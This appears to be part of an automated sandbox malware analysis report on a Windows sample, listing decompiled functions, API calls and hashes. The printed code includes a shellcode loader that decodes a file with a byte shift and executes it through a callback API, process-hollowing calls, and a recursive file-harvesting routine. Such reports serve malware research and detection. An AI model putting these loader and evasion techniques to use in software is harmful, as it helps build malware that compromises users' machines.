RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,004226E8), ref: 00406426

Strings

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny, xrefs: 004063DC

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CloseQueryValue
String ID: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
API String ID: 3356406503-3416158739
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B21() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x4216cc;
				_t3 = E00403B06(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x4216cc =  *0x4216cc & 0x00000000;
				return _t3;
			}

0x00403b22
0x00403b2a
0x00403b31
0x00403b34
0x00403b34
0x00403b36
0x00403b3b
0x00403b42
0x00403b48
0x00403b4c
0x00403b4d
0x00403b55

APIs

FreeLibrary.KERNEL32(?,76F1FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
GlobalFree.KERNEL32 ref: 00403B42

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405f6c
0x00405f6e
0x00405f71
0x00405f9d
0x00405f76
0x00405f7f
0x00405f84
0x00405f8f
0x00405f92
0x00405fae
0x00405f94
0x00405f9b
0x00000000
0x00405f9b
0x00405fa7
0x00405fab
0x00405fab
0x00405fa5
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cbgsujmwws.exePID: 6240, Parent PID: 7152COMMON

Execution Graph

Execution Coverage:	56.9%
Dynamic/Decrypted Code Coverage:	86.7%
Signature Coverage:	21%
Total number of Nodes:	105
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 009E03F8 Relevance: 10.7, APIs: 7, Instructions: 201
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009E04DB
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 009E0502
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 009E0519
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 009E053D
FindCloseChangeNotification.KERNELBASE(00000000,?), ref: 009E05AE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 009E05B9
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 009E0611

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
Instruction ID: 1e0cca0777b85bd6971ce198816616e128bd0942ee42f3670f85a4f568d2d1e8
Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
Instruction Fuzzy Hash: D7616D35A00294ABCF11DBA6C884BAEBBB9FFC8710F144419F505EB290DBB59D81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 16.6, APIs: 11, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				WCHAR* _v8;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOW _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t37;
				intOrPtr _t38;
				signed int _t40;
				int _t42;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t52;
				int _t58;
				intOrPtr* _t61;
				intOrPtr _t66;

				_push(0xffffffff);
				_push(0x402168);
				_push(0x40135e);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_v28 = _t66 - 0x68;
				_v8 = 0;
				_t58 = 2;
				__set_app_type(_t58);
				 *0x403030 =  *0x403030 | 0xffffffff;
				 *0x403034 =  *0x403034 | 0xffffffff;
				 *(__p__fmode()) =  *0x40302c;
				 *(__p__commode()) =  *0x403028;
				 *0x403038 = _adjust_fdiv;
				E0040119A( *_adjust_fdiv);
				if( *0x403010 == 0) {
					__setusermatherr(E00401197);
				}
				E00401185();
				L00401358();
				_v112 =  *0x403024;
				__imp____wgetmainargs( &_v100,  &_v116,  &_v104,  *0x403020,  &_v112, 0x403008, 0x40300c); // executed
				_push(0x403004);
				_push(0x403000);
				L00401358();
				_t37 = __imp___wcmdln;
				_t61 =  *_t37;
				if(_t61 != 0) {
					_v120 = _t61;
					if( *_t61 != 0x22) {
						while( *_t61 > 0x20) {
							_t61 = _t61 + _t58;
							_v120 = _t61;
						}
					} else {
						do {
							_t61 = _t61 + _t58;
							_v120 = _t61;
							_t44 =  *_t61;
						} while (_t44 != 0 && _t44 != 0x22);
						if( *_t61 == 0x22) {
							L8:
							_t61 = _t61 + _t58;
							_v120 = _t61;
						}
					}
					_t38 =  *_t61;
					if(_t38 != 0 && _t38 <= 0x20) {
						goto L8;
					}
					_v96.dwFlags = 0;
					GetStartupInfoW( &_v96);
					if((_v96.dwFlags & 0x00000001) == 0) {
						_t40 = 0xa;
					} else {
						_t40 = _v96.wShowWindow & 0x0000ffff;
					}
					_push(_t40);
					_t42 = E004011A0(GetModuleHandleW(0), _t41, 0, _t61); // executed
					_v108 = _t42;
					exit(_t42);
					_t43 = _v24;
					_t52 =  *((intOrPtr*)( *_t43));
					_v124 = _t52;
					_push(_t43);
					_push(_t52);
					L00401352();
					return _t43;
				} else {
					_v8 = _v8 | 0xffffffff;
					 *[fs:0x0] = _v20;
					return _t37;
				}
			}

0x00401003
0x00401005
0x0040100a
0x00401015
0x00401016
0x00401023
0x00401028
0x0040102d
0x0040102f
0x00401036
0x0040103d
0x00401050
0x0040105e
0x00401067
0x0040106c
0x00401077
0x0040107e
0x00401084
0x00401085
0x00401094
0x0040109e
0x004010b7
0x004010bd
0x004010c2
0x004010c7
0x004010cf
0x004010d4
0x004010d8
0x004010ed
0x004010f4
0x0040113b
0x00401141
0x00401143
0x00401143
0x004010f6
0x004010f6
0x004010f6
0x004010f8
0x004010fb
0x004010fe
0x0040110d
0x0040110f
0x0040110f
0x00401111
0x00401111
0x0040110d
0x00401114
0x0040111a
0x00000000
0x00000000
0x00401122
0x00401129
0x00401133
0x0040114a
0x00401135
0x00401135
0x00401135
0x0040114b
0x00401156
0x0040115b
0x0040115f
0x00401165
0x0040116a
0x0040116c
0x0040116f
0x00401170
0x00401171
0x00401178
0x004010da
0x004010da
0x004010e1
0x004010ec
0x004010ec

APIs

__set_app_type.MSVCRT ref: 0040102F
__p__fmode.MSVCRT ref: 00401044
__p__commode.MSVCRT ref: 00401052
__setusermatherr.MSVCRT ref: 0040107E
_initterm.MSVCRT ref: 00401094
__wgetmainargs.KERNELBASE ref: 004010B7
_initterm.MSVCRT ref: 004010C7
GetStartupInfoW.KERNEL32(?), ref: 00401129
GetModuleHandleW.KERNEL32(00000000,00000000,?,0000000A), ref: 0040114F
exit.MSVCRT ref: 0040115F
_XcptFilter.MSVCRT ref: 00401171

Memory Dump Source

Source File: 00000001.00000002.383118710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.383011988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.383135317.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.383142811.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_cbgsujmwws.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargsexit
String ID:
API String ID: 3327129161-0
Opcode ID: 8dafb201eb734e2b29dd9e08e532ee1d196ab9d7a7f52f69850e36d37ddcb6e7
Instruction ID: 11a260af087a29fe1a0fc47c9490740ac2a9aaee7c65a71006a5a4670e9b993a
Opcode Fuzzy Hash: 8dafb201eb734e2b29dd9e08e532ee1d196ab9d7a7f52f69850e36d37ddcb6e7
Instruction Fuzzy Hash: 49416175D00304DBD724AFA5DE49AAEBBB8FB08711F20423BEA55B72E0D7784940CB58

Uniqueness

Uniqueness Score: -1.00%

Function 009E1042 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 009E1186
GetThreadContext.KERNELBASE(?,00010007), ref: 009E11A9

Strings

D, xrefs: 009E110F

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: c25b858f06e4c917b019ec7fa001e0fe063ab54475df0a55ab58540d308b90ae
Instruction ID: b8caf18a2582a633c029943c3fc692ac3ddf393cdac15215601985b7503616de
Opcode Fuzzy Hash: c25b858f06e4c917b019ec7fa001e0fe063ab54475df0a55ab58540d308b90ae
Instruction Fuzzy Hash: C2A10270E00289EFDB41DFA5C981BAEBBB9BF88305F104465E616EB250D775AE81DF10

Uniqueness

Uniqueness Score: -1.00%

Function 009E0809 Relevance: 7.7, APIs: 5, Instructions: 194
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009E09C3

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9f4f437ade6284ade4142461f9046f964e6be493b81db691edad8aa67c591b58
Instruction ID: 51e3c0fde523ca82862adc960b7c7fcc8f69b5f53ea618fd6b01c535ccc8d69e
Opcode Fuzzy Hash: 9f4f437ade6284ade4142461f9046f964e6be493b81db691edad8aa67c591b58
Instruction Fuzzy Hash: 0F712A35E50388EADF61DBE4EC16BEDB7B5BF84710F20441AE508EA2A0D7B51E81DB05

Uniqueness

Uniqueness Score: -1.00%

Function 004011A0 Relevance: 6.0, APIs: 4, Instructions: 36
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004011A0(struct _IO_FILE* __eax, intOrPtr _a12) {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t9;
				struct _IO_FILE* _t10;
				void* _t11;

				_t11 = 0; // executed
				__imp___wfopen(_a12, 0x402160); // executed
				_t10 = __eax;
				_t5 = VirtualAlloc(0, 0x130b, 0x3000, 0x40); // executed
				_t9 = _t5;
				fread(_t9, 0x130b, 1, _t10); // executed
				do {
					 *((char*)(_t9 + _t11)) =  *((char*)(_t9 + _t11)) + 0x9f;
					_t11 = _t11 + 1;
				} while (_t11 < 0x130b);
				EnumSystemCodePagesW(_t9, 0); // executed
				return 0;
			}

0x004011ae
0x004011b0
0x004011b9
0x004011c8
0x004011d1
0x004011d9
0x004011e2
0x004011e2
0x004011e6
0x004011e7
0x004011f2
0x004011fe

APIs

_wfopen.MSVCRT ref: 004011B0
VirtualAlloc.KERNELBASE(00000000,0000130B,00003000,00000040,?,0000000A), ref: 004011C8
fread.MSVCRT ref: 004011D9
EnumSystemCodePagesW.KERNELBASE(-0000009F,00000000), ref: 004011F2

Memory Dump Source

Source File: 00000001.00000002.383118710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.383011988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.383135317.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.383142811.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_cbgsujmwws.jbxd

Similarity

API ID: AllocCodeEnumPagesSystemVirtual_wfopenfread
String ID:
API String ID: 2195606930-0
Opcode ID: 5c764e3af0298bfe95c31cd4073b1d3caadb83553ba945ca3328315d938b7577
Instruction ID: 4bb8e012a69938b8dd27b52907602b0484aa1db538f63dcbbfec20f42bee5725
Opcode Fuzzy Hash: 5c764e3af0298bfe95c31cd4073b1d3caadb83553ba945ca3328315d938b7577
Instruction Fuzzy Hash: D1F027316443147BF3221B756E5EF9B7E6CEB49B25F100432FB01790D2D1F54A1182AC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009E061D Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
Instruction ID: fb363e13fa838bddefc953a8632316829102b6b4a25a95975d22a113381e3759
Opcode Fuzzy Hash: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
Instruction Fuzzy Hash: DF21BE36A00218AFCB10DFAAC880AADF3F9EFD8754B14456AE442D3361E6B4DE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E0736 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
Instruction ID: 506eeba15e78d819bfe206f414025bf2d1c6d1582c4f0bdb9b86a9840fddf630
Opcode Fuzzy Hash: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
Instruction Fuzzy Hash: 18E01A357606469FCB05CBB9D981D59B3F8EB88368B144294F816C73E1EA74FD40DA50

Uniqueness

Uniqueness Score: -1.00%

Function 009E0772 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
Instruction ID: 9d1013b060713f16582c92978235ac5011ab97908b18bcae045e74c4e986442e
Opcode Fuzzy Hash: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
Instruction Fuzzy Hash: 65E086363105509BD322DA5AC880A57F3E9EBC83B07154869E88AD3711C270FC408A90

Uniqueness

Uniqueness Score: -1.00%

Function 009E06F7 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.383598555.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9e0000_cbgsujmwws.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cbgsujmwws.exePID: 492, Parent PID: 6240COMMON

Execution Graph

Execution Coverage:	31%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.3%
Total number of Nodes:	1850
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
